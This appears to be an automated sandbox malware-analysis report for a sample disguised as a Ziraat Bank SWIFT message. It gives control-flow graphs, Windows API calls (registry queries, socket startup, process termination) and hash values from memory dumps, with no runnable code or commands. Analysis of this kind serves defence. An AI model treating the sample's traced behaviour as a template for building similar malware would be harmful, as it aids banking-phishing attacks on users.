                                  control_flow_graph 16628 49d5750-49d5777 16987 49d5777 call 8cd438 16628->16987 16988 49d5777 call 8cd3d7 16628->16988 16632 49d577d-49d57c2 16990 49d57c2 call 8cd438 16632->16990 16991 49d57c2 call 8cd3d7 16632->16991 16992 49d57c2 call 8cd907 16632->16992 16635 49d57c8-49d5845 16954 49d584b call 8cd9c8 16635->16954 16955 49d584b call 8cd969 16635->16955 16642 49d5851-49d587b 16959 49d587d call 8cdb58 16642->16959 16960 49d587d call 8cdb60 16642->16960 16646 49d5883-49d58ad 16967 49d58af call 8cdb58 16646->16967 16968 49d58af call 8cdb60 16646->16968 16650 49d58b5-49d58df 16971 49d58e1 call 8cdb58 16650->16971 16972 49d58e1 call 8cdb60 16650->16972 16654 49d58e7-49d5911 16979 49d5913 call 8cdb58 16654->16979 16980 49d5913 call 8cdb60 16654->16980 16658 49d5919-49d5942 call 49d3248 16983 49d5944 call 8cdb58 16658->16983 16984 49d5944 call 8cdb60 16658->16984 16663 49d594a-49d59b6 LdrInitializeThunk 16664 49d59bc-49d59df 16663->16664 16665 49d5c91-49d5ce8 call 8cdea8 16663->16665 16671 49d59e5 16664->16671 16672 49d5b26-49d5b49 16664->16672 16993 49d5ce8 call 8ce3cf 16665->16993 16994 49d5ce8 call 8ce49f 16665->16994 16995 49d5ce8 call 8cdea8 16665->16995 16996 49d5ce8 call 8ce3a7 16665->16996 16997 49d5ce8 call 8ce440 16665->16997 16671->16672 16673 49d59eb-49d5b21 call 49d3d10 * 8 16671->16673 16679 49d5b4f-49d5b51 16672->16679 16680 49d5b4b 16672->16680 16673->16665 16675 49d5cee-49d5d3f 16961 49d5d3f call 8ce500 16675->16961 16962 49d5d3f call 8ce560 16675->16962 16685 49d5b58-49d5b81 16679->16685 16683 49d5b4d 16680->16683 16684 49d5b53 16680->16684 16683->16679 16684->16685 16696 49d5b87-49d5b89 16685->16696 16697 49d5b83 16685->16697 16686 49d5d45-49d5d96 16975 49d5d96 call 8cf030 16686->16975 16976 49d5d96 call 8cf040 16686->16976 16701 49d5b90-49d5b96 16696->16701 16699 49d5b8b 16697->16699 16700 49d5b85 16697->16700 16698 49d5d9c-49d5de1 16985 49d5de1 call 8cf16d 16698->16985 16986 49d5de1 call 8cf170 16698->16986 16699->16701 16700->16696 16701->16665 16702 49d5b9c-49d5c68 call 49d0628 * 4 call 49d0670 16701->16702 16702->16665 16710 49d5de7-49d5e2c 16951 49d5e2c call 8cf5b8 16710->16951 16952 49d5e2c call 8cf508 16710->16952 16953 49d5e2c call 8cf617 16710->16953 16720 49d5e32-49d5e83 16963 49d5e83 call 8cf93e 16720->16963 16964 49d5e83 call 8cf6d8 16720->16964 16965 49d5e83 call 8cf677 16720->16965 16966 49d5e83 call 8cfa10 16720->16966 16730 49d5e89-49d5ece 16977 49d5ece call 822ea0 16730->16977 16978 49d5ece call 822eb0 16730->16978 16739 49d5ed4-49d5f25 16981 49d5f25 call 823cc0 16739->16981 16982 49d5f25 call 823cb4 16739->16982 16748 49d5f2b-49d5fc7 16956 49d5fc7 call 824347 16748->16956 16957 49d5fc7 call 824288 16748->16957 16958 49d5fc7 call 8242e8 16748->16958 16769 49d5fcd-49d601e 16969 49d601e call 8243a8 16769->16969 16970 49d601e call 824408 16769->16970 16775 49d6024-49d6075 16973 49d6075 call 8245f8 16775->16973 16974 49d6075 call 8246a8 16775->16974 16778 49d607b-49d6145 16786 49d614b-49d619f 16778->16786 16787 49d65b1-49d65c2 16778->16787 16788 49d650f-49d651e 16786->16788 16795 49d65c8-49d65cf 16787->16795 16796 49d69a6-49d69ad 16787->16796 16789 49d6550-49d655f 16788->16789 16790 49d6520-49d6529 16788->16790 16792 49d656b-49d658a 16789->16792 16793 49d6561 16789->16793 16790->16789 16794 49d652b-49d6537 16790->16794 16801 49d658c-49d658e 16792->16801 16793->16792 16802 49d65a9 16794->16802 16803 49d6539-49d654e 16794->16803 16797 49d65d5-49d6631 call 49d2ad0 call 49d2b68 call 49d3368 16795->16797 16798 49d6667-49d666e 16795->16798 16799 49d69af-49d6a0c 16796->16799 16800 49d6a17-49d6a32 16796->16800 16846 49d6636 16797->16846 16807 49d681a-49d6821 16798->16807 16808 49d6674-49d67f5 call 49d21f8 call 49d20d8 call 49d3770 call 49d2b68 call 49d0498 16798->16808 16799->16800 16805 49d61a4-49d6216 16801->16805 16806 49d6594-49d65a7 16801->16806 16804 49d65ae 16802->16804 16803->16801 16816 49d65af 16804->16816 16805->16788 16839 49d621c-49d6223 16805->16839 16806->16804 16807->16796 16812 49d6827-49d6989 call 49d2b68 call 49d21f8 call 49d20d8 call 49d2120 16807->16812 16808->16796 16812->16796 16816->16816 16840 49d6229-49d6347 call 49d3d10 * 8 16839->16840 16841 49d6392-49d63bd 16839->16841 16948 49d635e-49d638d 16840->16948 16949 49d6349-49d6353 16840->16949 16841->16788 16845 49d63c3-49d647f 16841->16845 16924 49d6485-49d64e6 16845->16924 16846->16796 16924->16788 16948->16788 16949->16948 16951->16720 16952->16720 16953->16720 16954->16642 16955->16642 16956->16769 16957->16769 16958->16769 16959->16646 16960->16646 16961->16686 16962->16686 16963->16730 16964->16730 16965->16730 16966->16730 16967->16650 16968->16650 16969->16775 16970->16775 16971->16654 16972->16654 16973->16778 16974->16778 16975->16698 16976->16698 16977->16739 16978->16739 16979->16658 16980->16658 16981->16748 16982->16748 16983->16663 16984->16663 16985->16710 16986->16710 16987->16632 16988->16632 16990->16635 16991->16635 16992->16635 16993->16675 16994->16675 16995->16675 16996->16675 16997->16675
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 174c078eb08c4d1fb1cdd7e37397b76db911b07c15a4fbaa5affc00d4f18bf6c
                                  • Instruction ID: 7c2ea6b1622607b729422cb328e823070ffacfd2c51cd030a5f7bc0386c80eeb
                                  • Opcode Fuzzy Hash: 174c078eb08c4d1fb1cdd7e37397b76db911b07c15a4fbaa5affc00d4f18bf6c
                                  • Instruction Fuzzy Hash: 6612B8B4A006299FCB64DF68DC54B99BBF2AF48312F1085E6D90DA3314DB345E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 16998 49d57a7-49d57c2 17319 49d57c2 call 8cd438 16998->17319 17320 49d57c2 call 8cd3d7 16998->17320 17321 49d57c2 call 8cd907 16998->17321 17002 49d57c8-49d5845 17330 49d584b call 8cd9c8 17002->17330 17331 49d584b call 8cd969 17002->17331 17009 49d5851-49d587b 17335 49d587d call 8cdb58 17009->17335 17336 49d587d call 8cdb60 17009->17336 17013 49d5883-49d58ad 17343 49d58af call 8cdb58 17013->17343 17344 49d58af call 8cdb60 17013->17344 17017 49d58b5-49d58df 17347 49d58e1 call 8cdb58 17017->17347 17348 49d58e1 call 8cdb60 17017->17348 17021 49d58e7-49d5911 17355 49d5913 call 8cdb58 17021->17355 17356 49d5913 call 8cdb60 17021->17356 17025 49d5919-49d5942 call 49d3248 17359 49d5944 call 8cdb58 17025->17359 17360 49d5944 call 8cdb60 17025->17360 17030 49d594a-49d59b6 LdrInitializeThunk 17031 49d59bc-49d59df 17030->17031 17032 49d5c91-49d5ce8 call 8cdea8 17030->17032 17038 49d59e5 17031->17038 17039 49d5b26-49d5b49 17031->17039 17322 49d5ce8 call 8ce3cf 17032->17322 17323 49d5ce8 call 8ce49f 17032->17323 17324 49d5ce8 call 8cdea8 17032->17324 17325 49d5ce8 call 8ce3a7 17032->17325 17326 49d5ce8 call 8ce440 17032->17326 17038->17039 17040 49d59eb-49d5b21 call 49d3d10 * 8 17038->17040 17046 49d5b4f-49d5b51 17039->17046 17047 49d5b4b 17039->17047 17040->17032 17042 49d5cee-49d5d3f 17341 49d5d3f call 8ce500 17042->17341 17342 49d5d3f call 8ce560 17042->17342 17052 49d5b58-49d5b81 17046->17052 17050 49d5b4d 17047->17050 17051 49d5b53 17047->17051 17050->17046 17051->17052 17063 49d5b87-49d5b89 17052->17063 17064 49d5b83 17052->17064 17053 49d5d45-49d5d96 17351 49d5d96 call 8cf030 17053->17351 17352 49d5d96 call 8cf040 17053->17352 17068 49d5b90-49d5b96 17063->17068 17066 49d5b8b 17064->17066 17067 49d5b85 17064->17067 17065 49d5d9c-49d5de1 17361 49d5de1 call 8cf16d 17065->17361 17362 49d5de1 call 8cf170 17065->17362 17066->17068 17067->17063 17068->17032 17069 49d5b9c-49d5c68 call 49d0628 * 4 call 49d0670 17068->17069 17069->17032 17077 49d5de7-49d5e2c 17327 49d5e2c call 8cf5b8 17077->17327 17328 49d5e2c call 8cf508 17077->17328 17329 49d5e2c call 8cf617 17077->17329 17087 49d5e32-49d5e83 17337 49d5e83 call 8cf93e 17087->17337 17338 49d5e83 call 8cf6d8 17087->17338 17339 49d5e83 call 8cf677 17087->17339 17340 49d5e83 call 8cfa10 17087->17340 17097 49d5e89-49d5ece 17353 49d5ece call 822ea0 17097->17353 17354 49d5ece call 822eb0 17097->17354 17106 49d5ed4-49d5f25 17357 49d5f25 call 823cc0 17106->17357 17358 49d5f25 call 823cb4 17106->17358 17115 49d5f2b-49d5fc7 17332 49d5fc7 call 824347 17115->17332 17333 49d5fc7 call 824288 17115->17333 17334 49d5fc7 call 8242e8 17115->17334 17136 49d5fcd-49d601e 17345 49d601e call 8243a8 17136->17345 17346 49d601e call 824408 17136->17346 17142 49d6024-49d6075 17349 49d6075 call 8245f8 17142->17349 17350 49d6075 call 8246a8 17142->17350 17145 49d607b-49d6145 17153 49d614b-49d619f 17145->17153 17154 49d65b1-49d65c2 17145->17154 17155 49d650f-49d651e 17153->17155 17162 49d65c8-49d65cf 17154->17162 17163 49d69a6-49d69ad 17154->17163 17156 49d6550-49d655f 17155->17156 17157 49d6520-49d6529 17155->17157 17159 49d656b-49d658a 17156->17159 17160 49d6561 17156->17160 17157->17156 17161 49d652b-49d6537 17157->17161 17168 49d658c-49d658e 17159->17168 17160->17159 17169 49d65a9 17161->17169 17170 49d6539-49d654e 17161->17170 17164 49d65d5-49d6631 call 49d2ad0 call 49d2b68 call 49d3368 17162->17164 17165 49d6667-49d666e 17162->17165 17166 49d69af-49d6a0c 17163->17166 17167 49d6a17-49d6a32 17163->17167 17213 49d6636 17164->17213 17174 49d681a-49d6821 17165->17174 17175 49d6674-49d67f5 call 49d21f8 call 49d20d8 call 49d3770 call 49d2b68 call 49d0498 17165->17175 17166->17167 17172 49d61a4-49d6216 17168->17172 17173 49d6594-49d65a7 17168->17173 17171 49d65ae 17169->17171 17170->17168 17183 49d65af 17171->17183 17172->17155 17206 49d621c-49d6223 17172->17206 17173->17171 17174->17163 17179 49d6827-49d6989 call 49d2b68 call 49d21f8 call 49d20d8 call 49d2120 17174->17179 17175->17163 17179->17163 17183->17183 17207 49d6229-49d6347 call 49d3d10 * 8 17206->17207 17208 49d6392-49d63bd 17206->17208 17315 49d635e-49d638d 17207->17315 17316 49d6349-49d6353 17207->17316 17208->17155 17212 49d63c3-49d647f 17208->17212 17291 49d6485-49d64e6 17212->17291 17213->17163 17291->17155 17315->17155 17316->17315 17319->17002 17320->17002 17321->17002 17322->17042 17323->17042 17324->17042 17325->17042 17326->17042 17327->17087 17328->17087 17329->17087 17330->17009 17331->17009 17332->17136 17333->17136 17334->17136 17335->17013 17336->17013 17337->17097 17338->17097 17339->17097 17340->17097 17341->17053 17342->17053 17343->17017 17344->17017 17345->17142 17346->17142 17347->17021 17348->17021 17349->17145 17350->17145 17351->17065 17352->17065 17353->17106 17354->17106 17355->17025 17356->17025 17357->17115 17358->17115 17359->17030 17360->17030 17361->17077 17362->17077
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5bca2c38ef304ac004203e5950634bbb8f4be10569f8c8ce8814a25f2f30ba57
                                  • Instruction ID: 2b358879bcbc2884dd07ec5dc8cff6585ee9c535eac73eafcc76889d8426d870
                                  • Opcode Fuzzy Hash: 5bca2c38ef304ac004203e5950634bbb8f4be10569f8c8ce8814a25f2f30ba57
                                  • Instruction Fuzzy Hash: DA02B8B4A006299FCB64DF68DC58B99BBF2AF48312F1085E6D90DA3314DB349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 17363 49d57f2-49d5845 17680 49d584b call 8cd9c8 17363->17680 17681 49d584b call 8cd969 17363->17681 17371 49d5851-49d587b 17689 49d587d call 8cdb58 17371->17689 17690 49d587d call 8cdb60 17371->17690 17375 49d5883-49d58ad 17693 49d58af call 8cdb58 17375->17693 17694 49d58af call 8cdb60 17375->17694 17379 49d58b5-49d58df 17701 49d58e1 call 8cdb58 17379->17701 17702 49d58e1 call 8cdb60 17379->17702 17383 49d58e7-49d5911 17705 49d5913 call 8cdb58 17383->17705 17706 49d5913 call 8cdb60 17383->17706 17387 49d5919-49d5942 call 49d3248 17709 49d5944 call 8cdb58 17387->17709 17710 49d5944 call 8cdb60 17387->17710 17392 49d594a-49d59b6 LdrInitializeThunk 17393 49d59bc-49d59df 17392->17393 17394 49d5c91-49d5ce8 call 8cdea8 17392->17394 17400 49d59e5 17393->17400 17401 49d5b26-49d5b49 17393->17401 17714 49d5ce8 call 8ce3cf 17394->17714 17715 49d5ce8 call 8ce49f 17394->17715 17716 49d5ce8 call 8cdea8 17394->17716 17717 49d5ce8 call 8ce3a7 17394->17717 17718 49d5ce8 call 8ce440 17394->17718 17400->17401 17402 49d59eb-49d5b21 call 49d3d10 * 8 17400->17402 17408 49d5b4f-49d5b51 17401->17408 17409 49d5b4b 17401->17409 17402->17394 17404 49d5cee-49d5d3f 17691 49d5d3f call 8ce500 17404->17691 17692 49d5d3f call 8ce560 17404->17692 17414 49d5b58-49d5b81 17408->17414 17412 49d5b4d 17409->17412 17413 49d5b53 17409->17413 17412->17408 17413->17414 17425 49d5b87-49d5b89 17414->17425 17426 49d5b83 17414->17426 17415 49d5d45-49d5d96 17697 49d5d96 call 8cf030 17415->17697 17698 49d5d96 call 8cf040 17415->17698 17430 49d5b90-49d5b96 17425->17430 17428 49d5b8b 17426->17428 17429 49d5b85 17426->17429 17427 49d5d9c-49d5de1 17711 49d5de1 call 8cf16d 17427->17711 17712 49d5de1 call 8cf170 17427->17712 17428->17430 17429->17425 17430->17394 17431 49d5b9c-49d5c68 call 49d0628 * 4 call 49d0670 17430->17431 17431->17394 17439 49d5de7-49d5e2c 17719 49d5e2c call 8cf5b8 17439->17719 17720 49d5e2c call 8cf508 17439->17720 17721 49d5e2c call 8cf617 17439->17721 17449 49d5e32-49d5e83 17685 49d5e83 call 8cf93e 17449->17685 17686 49d5e83 call 8cf6d8 17449->17686 17687 49d5e83 call 8cf677 17449->17687 17688 49d5e83 call 8cfa10 17449->17688 17459 49d5e89-49d5ece 17699 49d5ece call 822ea0 17459->17699 17700 49d5ece call 822eb0 17459->17700 17468 49d5ed4-49d5f25 17707 49d5f25 call 823cc0 17468->17707 17708 49d5f25 call 823cb4 17468->17708 17477 49d5f2b-49d5fc7 17682 49d5fc7 call 824347 17477->17682 17683 49d5fc7 call 824288 17477->17683 17684 49d5fc7 call 8242e8 17477->17684 17498 49d5fcd-49d601e 17695 49d601e call 8243a8 17498->17695 17696 49d601e call 824408 17498->17696 17504 49d6024-49d6075 17703 49d6075 call 8245f8 17504->17703 17704 49d6075 call 8246a8 17504->17704 17507 49d607b-49d6145 17515 49d614b-49d619f 17507->17515 17516 49d65b1-49d65c2 17507->17516 17517 49d650f-49d651e 17515->17517 17524 49d65c8-49d65cf 17516->17524 17525 49d69a6-49d69ad 17516->17525 17518 49d6550-49d655f 17517->17518 17519 49d6520-49d6529 17517->17519 17521 49d656b-49d658a 17518->17521 17522 49d6561 17518->17522 17519->17518 17523 49d652b-49d6537 17519->17523 17530 49d658c-49d658e 17521->17530 17522->17521 17531 49d65a9 17523->17531 17532 49d6539-49d654e 17523->17532 17526 49d65d5-49d6631 call 49d2ad0 call 49d2b68 call 49d3368 17524->17526 17527 49d6667-49d666e 17524->17527 17528 49d69af-49d6a0c 17525->17528 17529 49d6a17-49d6a32 17525->17529 17575 49d6636 17526->17575 17536 49d681a-49d6821 17527->17536 17537 49d6674-49d67f5 call 49d21f8 call 49d20d8 call 49d3770 call 49d2b68 call 49d0498 17527->17537 17528->17529 17534 49d61a4-49d6216 17530->17534 17535 49d6594-49d65a7 17530->17535 17533 49d65ae 17531->17533 17532->17530 17545 49d65af 17533->17545 17534->17517 17568 49d621c-49d6223 17534->17568 17535->17533 17536->17525 17541 49d6827-49d6989 call 49d2b68 call 49d21f8 call 49d20d8 call 49d2120 17536->17541 17537->17525 17541->17525 17545->17545 17569 49d6229-49d6347 call 49d3d10 * 8 17568->17569 17570 49d6392-49d63bd 17568->17570 17677 49d635e-49d638d 17569->17677 17678 49d6349-49d6353 17569->17678 17570->17517 17574 49d63c3-49d647f 17570->17574 17653 49d6485-49d64e6 17574->17653 17575->17525 17653->17517 17677->17517 17678->17677 17680->17371 17681->17371 17682->17498 17683->17498 17684->17498 17685->17459 17686->17459 17687->17459 17688->17459 17689->17375 17690->17375 17691->17415 17692->17415 17693->17379 17694->17379 17695->17504 17696->17504 17697->17427 17698->17427 17699->17468 17700->17468 17701->17383 17702->17383 17703->17507 17704->17507 17705->17387 17706->17387 17707->17477 17708->17477 17709->17392 17710->17392 17711->17439 17712->17439 17714->17404 17715->17404 17716->17404 17717->17404 17718->17404 17719->17449 17720->17449 17721->17449
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.554353794.00000000049D0000.00000040.00000001.sdmp, Offset: 049D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_49d0000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bdc9c78b2433a73bc88784a2934a08c30f19099f2ec16f1ce023c2845145fefb
                                  • Instruction ID: d6ae94d89ccf6341efd520d040ca8382fd2911f8198ecb31974e9917da9f1a42
                                  • Opcode Fuzzy Hash: bdc9c78b2433a73bc88784a2934a08c30f19099f2ec16f1ce023c2845145fefb
                                  • Instruction Fuzzy Hash: 7502B874A006299FCB64DF68DC58B99BBB2AF48312F1085E6D90DA3314DB34AE85CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 17722 824a99-824ab7 17723 824ab9-824ac3 17722->17723 17724 824adc-824b07 17722->17724 17725 824ac5-824ad6 17723->17725 17726 824ad8-824adb 17723->17726 17729 824b09-824b13 17724->17729 17730 824b2c-824b9a 17724->17730 17725->17726 17731 824b15-824b26 17729->17731 17732 824b28-824b2b 17729->17732 17741 824ba1-824bb8 LdrInitializeThunk 17730->17741 17731->17732 17742 824d05-824d2a 17741->17742 17743 824bbe-824bdc 17741->17743 17757 824d2f-824d38 17742->17757 17743->17742 17746 824be2-824bfc 17743->17746 17749 824c02 17746->17749 17750 824bfe-824c00 17746->17750 17752 824c05-824c5e 17749->17752 17750->17752 17762 824c60-824c62 17752->17762 17763 824c64 17752->17763 17764 824c67-824d03 17762->17764 17763->17764 17764->17757
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.551908161.0000000000820000.00000040.00000010.sdmp, Offset: 00820000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ccf3a044aa0ce4e40d696aee75a5c3d3fb9aec8012a2f3741caddada4cca7d08
                                  • Instruction ID: 71c55eb3bc169dbfe4d32b80c0584bc70c78f192fc99bb2bf4e5525be32c50ea
                                  • Opcode Fuzzy Hash: ccf3a044aa0ce4e40d696aee75a5c3d3fb9aec8012a2f3741caddada4cca7d08
                                  • Instruction Fuzzy Hash: 5E619F30B002499FDB05EBB4E854AAEBBF5FF85304F24857AE405DB295EB34D846C761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 17781 824b48-824bb8 LdrInitializeThunk 17789 824d05-824d2a 17781->17789 17790 824bbe-824bdc 17781->17790 17804 824d2f-824d38 17789->17804 17790->17789 17793 824be2-824bfc 17790->17793 17796 824c02 17793->17796 17797 824bfe-824c00 17793->17797 17799 824c05-824c5e 17796->17799 17797->17799 17809 824c60-824c62 17799->17809 17810 824c64 17799->17810 17811 824c67-824d03 17809->17811 17810->17811 17811->17804
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.551908161.0000000000820000.00000040.00000010.sdmp, Offset: 00820000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 25e7e02593468dc6d1054baf6690f5fbfbdc72c6faf3457837c3cb9c6344b41e
                                  • Instruction ID: 5fcacf1fba8b8db668b4de549bddeca864f532a005eb962e20413d163a34e6b3
                                  • Opcode Fuzzy Hash: 25e7e02593468dc6d1054baf6690f5fbfbdc72c6faf3457837c3cb9c6344b41e
                                  • Instruction Fuzzy Hash: 8A513070B002099FDB04EBB8D945AAEB7F6FF88304F248969E505DB255EF309C45CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 17828 a8a90d-a8a9e1 17832 a8a9e3 17828->17832 17833 a8a9e6-a8a9fd 17828->17833 17832->17833 17835 a8aa3f-a8aa44 17833->17835 17836 a8a9ff-a8aa12 RegOpenKeyExW 17833->17836 17835->17836 17837 a8aa14-a8aa3c 17836->17837 17838 a8aa46-a8aa4b 17836->17838 17838->17837
                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00A8AA05
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 5fdf2dfeac76b55411f4ddebf35679b4ab09160899670c83bc2a32ca0876fed2
                                  • Instruction ID: a4e8d0f1d533fece5c9ce2fd01ac7f3387b865f633fd59c8c277e12b1424176d
                                  • Opcode Fuzzy Hash: 5fdf2dfeac76b55411f4ddebf35679b4ab09160899670c83bc2a32ca0876fed2
                                  • Instruction Fuzzy Hash: 97411D7654D7C45FE7138B358C64B56BFB8AF07210F0984DBE980CB1A3D269A948C772
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNELBASE(?,00000E80,66234D72,00000000,00000000,00000000,00000000), ref: 00A8AB08
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: eb69ecdfab44275c893549a43ea55b10c0cd00899a561806131898f244e21c5a
                                  • Instruction ID: 178882cd389b7ac679dfc67fe5681e5e8133907b2e242444314fa1b9d9c6a619
                                  • Opcode Fuzzy Hash: eb69ecdfab44275c893549a43ea55b10c0cd00899a561806131898f244e21c5a
                                  • Instruction Fuzzy Hash: 2B318F711097846FE722CB25CC84FA6FFE8EF06710F08849AE985DB152D264E948CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAStartup.WS2_32(?,00000E80,?,?), ref: 00A8A522
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: 0c17eced46c143dbf22d27b43fb47d17fa9c5c3834ee4793c631f8034900737d
                                  • Instruction ID: 45287062d295e95b3ab48b634922c25897ef75df5b1d7417a46837abd52a7ddf
                                  • Opcode Fuzzy Hash: 0c17eced46c143dbf22d27b43fb47d17fa9c5c3834ee4793c631f8034900737d
                                  • Instruction Fuzzy Hash: E0315E7140E3C06FD7138B258C65A62BFB4EF47610F1A81DBD984CF1A3D229A919C7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • TerminateProcess.KERNELBASE(?,00000E80,66234D72,00000000,00000000,00000000,00000000), ref: 00A8B32C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 8aa40406f12827635ecf8ffc8111b1f02d7e2340e8dd34d574a594ba54afd7f8
                                  • Instruction ID: 89f071c6d9cc43fae0975a13f2156c17e58d6471eca545974fcf7b97d3564ccc
                                  • Opcode Fuzzy Hash: 8aa40406f12827635ecf8ffc8111b1f02d7e2340e8dd34d574a594ba54afd7f8
                                  • Instruction Fuzzy Hash: 7021E5725093846FEB128B25DC45BA6BFB8EF46320F0884EAE984DF193D3249909C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FormatMessageW.KERNELBASE(?,00000E80,?,?), ref: 00A8B432
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FormatMessage
                                  • String ID:
                                  • API String ID: 1306739567-0
                                  • Opcode ID: 010f283ab23c508abfc2a5a95e6915dd60cdcdb735c260f066ba3a1d78f65078
                                  • Instruction ID: 073f40fce2f637c0d3fe416e3b46097357cdf0a07455d404bbdd69c1250fc830
                                  • Opcode Fuzzy Hash: 010f283ab23c508abfc2a5a95e6915dd60cdcdb735c260f066ba3a1d78f65078
                                  • Instruction Fuzzy Hash: D6318D7154E3C45FD7138B25CC55B62BFB4EF87610F0980CBD8848F2A3E624A909C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32GetModuleInformation.KERNEL32(?,00000E80,66234D72,00000000,00000000,00000000,00000000), ref: 00A8B81E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  • Opcode ID: f338126c57c4ea0f87c44889e04e4841a3a9648f5f8eb3d0b206ff8953a68a3d
                                  • Instruction ID: 69a6976d04e8b64601c95560edbef508266efc9cd9145455aad1f854d2ac6eb8
                                  • Opcode Fuzzy Hash: f338126c57c4ea0f87c44889e04e4841a3a9648f5f8eb3d0b206ff8953a68a3d
                                  • Instruction Fuzzy Hash: EE21A3715093846FE7128F26DC44F66BFACEF46310F0884AAE945DB152D364E848CB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 00A8B92A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.552180691.0000000000A8A000.00000040.00000001.sdmp, Offset: 00A8A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_a8a000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: FileModuleName
                                  • String ID:
                                  • API String ID: 514040917-0
                                  • Opcode ID: 45049937d35772d1766710cfd8c6a70f45ffa41198f12076ca344d414819c9d3
                                  • Instruction ID: 2d0f63a646520f40d13077593c55d2ecfdbcd2a42824034184a09536134ea409
                                  • Opcode Fuzzy Hash: 45049937d35772d1766710cfd8c6a70f45ffa41198f12076ca344d414819c9d3
                                  • Instruction Fuzzy Hash: 9E21AD714093C06FD3128B65CC55F66BFB8EF87610F0980DBD8849B1A3D624A909CBB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

